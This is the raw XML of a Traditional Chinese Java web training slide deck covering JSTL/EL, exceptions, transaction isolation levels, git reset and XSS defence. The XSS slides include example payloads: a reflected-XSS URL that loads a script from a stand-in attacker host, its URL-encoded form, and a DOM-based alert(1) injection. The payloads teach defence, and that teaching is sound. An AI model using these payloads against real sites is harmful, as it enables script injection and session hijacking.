              <a:t>jsp:getProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> property = “age” name=“person”/&gt;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1" y="1690688"/>
            <a:ext cx="2723285" cy="95204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0566" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包裝常用方法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c:out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param.out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"out missing" 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en-US" altLang="zh-TW" i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value - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>要輸出的內容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default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>裡面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>EL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>沒有值的時候，顯示的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escapeXml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>是否要把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>輸出特殊標籤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(encoding)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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fmt:parseDate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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parseDate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"2013-10-14 10:00:00"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parseLocale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"Asia/Taipei" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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/>
              <a:t>方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>庫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"foo"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fn:escapeXml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param.foo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2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Exception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82026" y="2190297"/>
            <a:ext cx="8592855" cy="406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40134" y="2535100"/>
            <a:ext cx="2505205" cy="792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60997" y="522016"/>
            <a:ext cx="378703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RuntimeException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73523" y="3099308"/>
            <a:ext cx="418160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ModuleException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73523" y="4532543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04543" y="2541791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DataNotFoundException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04543" y="4207623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ErrorInput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673523" y="4765140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673523" y="5014615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肘形接點 38"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931505"/>
            <a:ext cx="1028184" cy="254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5" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931505"/>
            <a:ext cx="1028184" cy="2058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9" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931504"/>
            <a:ext cx="1028184" cy="2290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6" idx="1"/>
            <a:endCxn id="23" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7855129" y="3099308"/>
            <a:ext cx="849415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27" idx="1"/>
            <a:endCxn id="23" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7855129" y="3556508"/>
            <a:ext cx="849415" cy="1208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1" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2645339" y="979216"/>
            <a:ext cx="1015658" cy="1952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23" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931504"/>
            <a:ext cx="1028184" cy="625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382025" y="297262"/>
            <a:ext cx="8592855" cy="138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3660997" y="47787"/>
            <a:ext cx="2401600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UnChecked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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673523" y="2014211"/>
            <a:ext cx="2389074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Checked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23" y="59595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Try{…}catch{…}finally{…}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783011"/>
            <a:ext cx="8934253" cy="491145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71167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JSP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0049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主程式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08931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102290" y="2379945"/>
            <a:ext cx="250521" cy="416735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1059140" y="2771628"/>
            <a:ext cx="293671" cy="596934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1046614" y="3338382"/>
            <a:ext cx="306197" cy="543746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>
            <a:off x="789140" y="3839247"/>
            <a:ext cx="563671" cy="2178818"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22693"/>
              <a:gd name="adj2" fmla="val 56341"/>
              <a:gd name="adj3" fmla="val 327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>
            <a:off x="4847573" y="200416"/>
            <a:ext cx="209184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>
            <a:off x="6943594" y="200416"/>
            <a:ext cx="220040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10800000">
            <a:off x="6939419" y="1423861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下彎) 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4719734" y="1436942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「exception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97" y="432984"/>
            <a:ext cx="1091298" cy="10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Transaction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交易管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="流程圖: 結束點 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875777" y="1651521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begin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838200" y="272314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交易活</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>動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537575" y="3632871"/>
            <a:ext cx="2317315" cy="9269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交易正常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38200" y="490008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commit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69437" y="3808235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rollback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875777" y="5913256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end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1696232" y="2240245"/>
            <a:ext cx="1" cy="48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8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1696233" y="3299343"/>
            <a:ext cx="0" cy="3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>
            <a:off x="1696233" y="4559797"/>
            <a:ext cx="0" cy="3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2"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1696232" y="5476283"/>
            <a:ext cx="1" cy="43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1" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854890" y="4096334"/>
            <a:ext cx="614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1" idx="2"/>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2510486" y="4390634"/>
            <a:ext cx="1823186" cy="1810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80" y="1964977"/>
            <a:ext cx="1104900" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="直線單箭頭接點 45"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="75" idx="2"/>
            <a:endCxn id="48" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6330216" y="3098690"/>
            <a:ext cx="626301" cy="458696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703914" y="3557386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54" name="流程圖: 程序 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114029" y="3557385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75" idx="2"/>
            <a:endCxn id="54" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6956517" y="3098690"/>
            <a:ext cx="783814" cy="458695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2"/>
            <a:endCxn id="63" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9532703" y="3041302"/>
            <a:ext cx="680727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程序 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906401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64" name="流程圖: 程序 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10309859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65" name="直線單箭頭接點 64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="43" idx="2"/>
            <a:endCxn id="64" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10213430" y="3041302"/>
            <a:ext cx="722731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向右箭號 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7799753" y="2357083"/>
            <a:ext cx="1594768" cy="588098"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 41481"/>
              <a:gd name="adj2" fmla="val 627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29" y="2041415"/>
            <a:ext cx="1171575" cy="1057275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1040" name="Picture 16" descr="「lightning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44" y="1617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字方塊 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6062353" y="4243521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42304" y="424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264840" y="4269583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68298" y="4264378"/>
            <a:ext cx="5357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80006" y="3752294"/>
            <a:ext cx="10515600" cy="313054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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW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9" y="3899774"/>
            <a:ext cx="6681603" cy="3348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5" y="4276627"/>
            <a:ext cx="7744248" cy="3056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91" y="4999935"/>
            <a:ext cx="10015140" cy="3930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54" y="4575959"/>
            <a:ext cx="10306277" cy="3930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79" y="5399777"/>
            <a:ext cx="6536039" cy="3639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71532" y="4199877"/>
            <a:ext cx="337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com.cathaybk.xx.dao.XX_CARS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96006" y="4566786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xx.dao.XX_CARS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02576" y="495508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610094" y="539056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DS_XX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eBAF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>JSTL &amp; EL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Exception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Transaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p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-reset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交易四大原則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原子性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Atomicity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所有異動都要完成，否則回復至異動前的狀態</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一致性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Consistency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交易開始前和結束後，資料庫的完整性沒有被破壞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隔離</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Isolation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資料庫允許多個交易同時對資料進行更動，並防止多個交易同時執行時由於交叉執行而導致資料不一致</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>持續性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Durability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提交後的資料狀態須保存下來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9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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="59BF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5" name="流程圖: 程序 4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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="DB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6" name="流程圖: 程序 5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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="5AD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8" name="流程圖: 磁碟 7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4" idx="2"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117850" y="3625139"/>
            <a:ext cx="2882900" cy="1707274"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="59BF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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6000750" y="3625139"/>
            <a:ext cx="12700" cy="1707274"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="DC7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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6000750" y="3625139"/>
            <a:ext cx="2908300" cy="1707274"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="5AD6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84" y="2379553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流程圖: 程序 6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8" name="流程圖: 程序 7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0650" y="1885950"/>
            <a:ext cx="9220200" cy="2190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9" idx="2"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000750" y="4076700"/>
            <a:ext cx="0" cy="125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40375" y="1942194"/>
            <a:ext cx="95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pic>
        <p:nvPicPr>
          <p:cNvPr id="11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84" y="2423277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Uncommitted:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指某個交易可以讀取另一個交易已更新但尚未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Committed:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>只允許讀取已認可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（已經成為資料庫永久部分的資料）。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Repeatable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Read:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鎖定查詢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中的資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，以防止其他交易更改資料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Serializable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>某一交易所使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所有資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表，全部都會被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鎖定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>交易循序進行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8084"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4157598" y="298450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Phantom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Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Uncommitted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>某</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>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Dirty read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5641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6288848" y="308472"/>
            <a:ext cx="1318452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4157598" y="647700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Dirty read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5802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(100-&gt;120)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Rollback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687" y="3460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Unrepeatable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Read Committed:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>只允許讀取已認可的資料（已經成為資料庫永久部分的資料）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Unrepeatable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747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7952547" y="308472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8" y="1008857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49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Update(A) (100-&gt;200)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Phantom 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Repeatable Read:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鎖定查詢中的資料，以防止其他交易更改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Phantom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035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9892884" y="333147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7" y="1395006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84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Insert(A) (200)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29608"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10128729" y="4777875"/>
          <a:ext cx="18727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27143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31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17590"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10128729" y="3749628"/>
          <a:ext cx="187277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40620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2694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10128729" y="3749628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10119443" y="4770073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XSS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6228" y="3900100"/>
            <a:ext cx="11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Cross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46764" y="391291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Site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8879" y="3900101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Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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hackertarget.com/xss-simple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365125"/>
            <a:ext cx="8603415" cy="6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79573" y="6116696"/>
            <a:ext cx="175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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>hackertarget.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz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XSS-Types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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Reflection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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>://localhost:8080/Demos/?username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“&gt;&lt;script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=”http://myattacksite.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/malicious.js”&gt;&lt;/script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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DOM Based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Http request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>//www.test.com/hello.html?name=test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Stored/Persistent XSS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3845" y="2217999"/>
            <a:ext cx="8229600" cy="879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http://localhost:8080/Demos/?username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%3D%E2%80%9C%3E%3Cscript%20src%3D%E2%80%9Dhttp%3A%2F%2Fmyattacksite.com%2Fjs%2Fmalicious.js%E2%80%9D%3E%3C%2Fscript%3E%0A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84" y="56539"/>
            <a:ext cx="1176907" cy="1053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09" y="1099097"/>
            <a:ext cx="1148942" cy="1168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24" y="1066205"/>
            <a:ext cx="1062065" cy="1018892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="「mail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78" y="392613"/>
            <a:ext cx="528186" cy="5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>
            <a:stCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7488980" y="238715"/>
            <a:ext cx="1711660" cy="860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單箭頭接點 2051"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7893700" y="820071"/>
            <a:ext cx="1410291" cy="69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單箭頭接點 2056"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10029240" y="343464"/>
            <a:ext cx="1880370" cy="76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單箭頭接點 2060"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10167973" y="1027906"/>
            <a:ext cx="1185828" cy="48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字方塊 2088"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1445894" y="3917405"/>
            <a:ext cx="739758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docmnent.URL.indexOf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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)+5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document.URL.substring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pos,document.URL.length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zh-TW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4396819" y="3854394"/>
            <a:ext cx="6184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http//www.test.com/hello.html?name=&lt;script&gt;alert(1)&lt;/script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eBAF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1246" y="3868394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E-Business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9339" y="3870468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Application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0747" y="388224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Framework</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>進行特殊字元與符號的跳脫或編碼處理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>白名單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過濾輸入字元（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、字串長度）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HttpOnly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禁止前端讀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，防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用安全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閱讀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>XSS Prevention Cheat Sheet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Servelet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>filter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JSTL or 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406812"/>
            <a:ext cx="83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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0" err="1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c:out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bean.userControlledValue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&lt;p&gt;&lt;input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name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"foo"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fn:escapeXml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param.foo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)}"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64" y="2250618"/>
            <a:ext cx="6943110" cy="25762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032" y="1281811"/>
            <a:ext cx="4165022" cy="156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26924" y="2845891"/>
            <a:ext cx="10067210" cy="10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096000" y="355415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243:ifnull + 16 -&gt; 259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7978047" y="3992778"/>
            <a:ext cx="39147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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="12000" spc="600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="12000" spc="600" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-reset</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="12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2868171" y="3834461"/>
            <a:ext cx="3802728" cy="2760885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="圓角矩形 36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圓角矩形 38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40" name="向右箭號 39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8" name="向右箭號 7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3305454"/>
            <a:ext cx="1330325" cy="8514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" name="直線單箭頭接點 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="3"/>
            <a:endCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439987" y="3731158"/>
            <a:ext cx="3094038" cy="186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534025" y="323056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61681" y="2993804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855200" y="323043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6"/>
            <a:endCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6657975" y="3749675"/>
            <a:ext cx="3197225" cy="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9" idx="4"/>
            <a:endCxn id="42" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10417175" y="426891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323137" y="3000115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979150" y="3501635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305325" y="4534185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(HEAD~1)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305325" y="5672920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(HEAD~2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="橢圓 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9855200" y="442859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855200" y="562675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42" idx="4"/>
